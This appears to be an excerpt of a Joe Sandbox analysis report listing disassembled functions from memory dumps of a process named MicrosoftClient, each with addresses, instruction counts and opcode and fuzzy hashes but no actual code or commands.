                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13b2363eb1b8a8d8b2dd1ee54e702c961b18b5180a6da7bb5d2c28ec5d3d1841
                                                                                            • Instruction ID: 3d949980166e77dc58a5a01ca4f924df285c28328d2a6211571a4f03e6177cbf
                                                                                            • Opcode Fuzzy Hash: 13b2363eb1b8a8d8b2dd1ee54e702c961b18b5180a6da7bb5d2c28ec5d3d1841
                                                                                            • Instruction Fuzzy Hash: AC51E922B0D6950FDB12A7ACD8B20E9BBB0EF47211B0500B3D189EF1E3DD5D68468741
                                                                                            Function 00007FFD34401699 Relevance: .3, Instructions: 340COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba1c8e77e053c7bfb93c890648f74fbf327229882906838716b401b97ba75f2c
                                                                                            • Instruction ID: 4c5887526380da2f0ebf5ac8ec95f8ee70663ed3f2b6ef313eeb1586a4c2a9be
                                                                                            • Opcode Fuzzy Hash: ba1c8e77e053c7bfb93c890648f74fbf327229882906838716b401b97ba75f2c
                                                                                            • Instruction Fuzzy Hash: FBB18071B18A4D4FEBA8FB78D4B96BC7692FF89305B800479E50ED32D6CD6DA8118740
                                                                                            Function 00007FFD34400C0E Relevance: .2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8446d8c45138a6a85ce82da151134349196b4fb3b80c0c03a006a6b2602d509f
                                                                                            • Instruction ID: 8114ee4431b706942a56305f6e3724f58f761c539b3432a1bab9bcf8b5745916
                                                                                            • Opcode Fuzzy Hash: 8446d8c45138a6a85ce82da151134349196b4fb3b80c0c03a006a6b2602d509f
                                                                                            • Instruction Fuzzy Hash: 6E512721B0E6CA0FE367A77898651B57BD6EF87210B0900FAD48DC71A7DC5DAC428352
                                                                                            Function 00007FFD34401B5A Relevance: .2, Instructions: 171COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f0b9c5bbd0aae450f3e0dd491ac9a5c309b88fa3a509dff89f485b2ecbd0a00
                                                                                            • Instruction ID: 2b03115870c231cd78ae48705305ecad8d1542fabc070b438ecc2a1cc5ed672e
                                                                                            • Opcode Fuzzy Hash: 9f0b9c5bbd0aae450f3e0dd491ac9a5c309b88fa3a509dff89f485b2ecbd0a00
                                                                                            • Instruction Fuzzy Hash: 1051E52170DAC50FE796A77C88692A5BFE6EF8A211B0901FFE48DC72A3CD595C46C301
                                                                                            Function 00007FFD34400558 Relevance: .1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a85bc3fad7d6edb89d971e41eaec9c3b2c1c4cf39e43834c1cd8f12c8e7b5f0
                                                                                            • Instruction ID: 8b60576aabe02a5bb78b357b790b19e81c36fa8b65ae0dd06ff58a82ce907b51
                                                                                            • Opcode Fuzzy Hash: 5a85bc3fad7d6edb89d971e41eaec9c3b2c1c4cf39e43834c1cd8f12c8e7b5f0
                                                                                            • Instruction Fuzzy Hash: BE31DB31B189490FE798EB6C886A679B6D2EB99305F05057EE44EC32E7DD699C418340
                                                                                            Function 00007FFD34400AA9 Relevance: .1, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 29cc076dbb1a0e0708ad7132376444d050d89f6b141d0c5bf05d3b55c5c8953f
                                                                                            • Instruction ID: 6895f910801b066b8c331df7f8e4082d05e2a927b92ea6bcbfc5a8536349ea47
                                                                                            • Opcode Fuzzy Hash: 29cc076dbb1a0e0708ad7132376444d050d89f6b141d0c5bf05d3b55c5c8953f
                                                                                            • Instruction Fuzzy Hash: 0F310721B18A094FEB90BBFC98693BDB7D1EF99311F05027BE00CC3297DD2858418392
                                                                                            Function 00007FFD3440096D Relevance: .1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7e5761186b747522a64c474cadec9a410adcfe2844b653f3f4421ca08714f998
                                                                                            • Instruction ID: d8833ba12f77b0615fc862858365a835a5bbb91bbcb3ca4122956b9bbe8bd297
                                                                                            • Opcode Fuzzy Hash: 7e5761186b747522a64c474cadec9a410adcfe2844b653f3f4421ca08714f998
                                                                                            • Instruction Fuzzy Hash: EB318F34B18A0E4FEB94EBA8D4B56FDBBB1FF99301F40047AD009D3286CD7968428B51
                                                                                            Function 00007FFD34401CE1 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 390f0469ffde37e6c15447b7b145209be9fa07bd110c4b2f4269ec976c94f390
                                                                                            • Instruction ID: ad58993d96ea1aa44c4fa930fe1cb58bb6924a5721b84e80d50eacff7f547eee
                                                                                            • Opcode Fuzzy Hash: 390f0469ffde37e6c15447b7b145209be9fa07bd110c4b2f4269ec976c94f390
                                                                                            • Instruction Fuzzy Hash: 80012B11A0DBC50FE752A73858A14757FE09F93310B0905BAED89C71EBDC4DA9419382

                                                                                            Executed Functions

                                                                                            Function 00007FFD343E1699 Relevance: .3, Instructions: 340COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1d53384ef90c8f1723afc336f5e9769799e39f76c190dc6299468c61d9e4d8d4
                                                                                            • Instruction ID: 68a1efe6f57621559037f6805fa13b56010b478b80193d605c36ac3f3c61059d
                                                                                            • Opcode Fuzzy Hash: 1d53384ef90c8f1723afc336f5e9769799e39f76c190dc6299468c61d9e4d8d4
                                                                                            • Instruction Fuzzy Hash: 35B19372B599594FEB94F76890B96B977E2FF99300B840479E00ED36D2CD3DAC818740
                                                                                            Function 00007FFD343E0C0E Relevance: .2, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c164d47195be08739173c598d41f8bf7889f49a3f0422c98dff20af7652fbfff
                                                                                            • Instruction ID: f925f30044acdecc01dc09381274a3b57b88e47a6b8ac155d6df7f0fd52e23b5
                                                                                            • Opcode Fuzzy Hash: c164d47195be08739173c598d41f8bf7889f49a3f0422c98dff20af7652fbfff
                                                                                            • Instruction Fuzzy Hash: 3E511821B5E6DA0FE767A77848652B67BE6EF87210B0900FAD48DC7193DC1D6C428351
                                                                                            Function 00007FFD343E1B5A Relevance: .2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 72a67b809d1ea39ac47582664d8b5714af30e713e6a6ef77d65cc116876683a1
                                                                                            • Instruction ID: cdf1149206e1929e947d791df9fc7edefb2a60e8b8bda98f35e58abf3b874235
                                                                                            • Opcode Fuzzy Hash: 72a67b809d1ea39ac47582664d8b5714af30e713e6a6ef77d65cc116876683a1
                                                                                            • Instruction Fuzzy Hash: AB51F62170DBC50FE796A7B8886A275BFD6EF9A211B0901FFE48DC72A3CD595C468301
                                                                                            Function 00007FFD343E0558 Relevance: .1, Instructions: 135COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3686a920ce7b7a0c4804a51573ef045e3387283531aa0fdaa2d6fb2fd147cba
                                                                                            • Instruction ID: 5698b76c1a13d2f73457459a650dc0c7a47bafd8f86c78fc51daf7d0e629f172
                                                                                            • Opcode Fuzzy Hash: e3686a920ce7b7a0c4804a51573ef045e3387283531aa0fdaa2d6fb2fd147cba
                                                                                            • Instruction Fuzzy Hash: 0B31D931B18A494FE798FB6C886A779B6D6EF99305F0805BEE44EC32D3DD689C418340
                                                                                            Function 00007FFD343E0AA9 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9ba19abf6db289d0f9bbc6d67876c49b17b9d7de48c421e07321187ef1aae3d3
                                                                                            • Instruction ID: a2128353297dbbeefcf56989491b17603c4363eafb8ee844d70e067f6e40d638
                                                                                            • Opcode Fuzzy Hash: 9ba19abf6db289d0f9bbc6d67876c49b17b9d7de48c421e07321187ef1aae3d3
                                                                                            • Instruction Fuzzy Hash: 8931C822B18A594FEB95BBBC58693BDB7E1FF99311F04017BE00DC3292DD2C58418392
                                                                                            Function 00007FFD343E096D Relevance: .1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5bd1cf5db4b5cf9231da5ec4f82c991114970207149aa7da79d1ad6cbdf14db2
                                                                                            • Instruction ID: b10bd7d06809509bbf9f143af0966dfe0eb176ba00188820c091ac6a58053788
                                                                                            • Opcode Fuzzy Hash: 5bd1cf5db4b5cf9231da5ec4f82c991114970207149aa7da79d1ad6cbdf14db2
                                                                                            • Instruction Fuzzy Hash: 3831A231B58A5A4FEB55FBA894B66EE77F1FF99300F94047AD009D3282CD396882C741
                                                                                            Function 00007FFD343E1CE1 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8e7c2f0ae030e34f4ba61ba58ff494b759e604ef2aa657933dbb220ce2823a18
                                                                                            • Instruction ID: a687c9bd25df3ede6bf633b88e2c0d882519b0e5129d849daff3fbb762d64b08
                                                                                            • Opcode Fuzzy Hash: 8e7c2f0ae030e34f4ba61ba58ff494b759e604ef2aa657933dbb220ce2823a18
                                                                                            • Instruction Fuzzy Hash: B9012B52E0D7D10FEB51773818A54767FE09B9731070C05AAECC8C71E7D81C99818782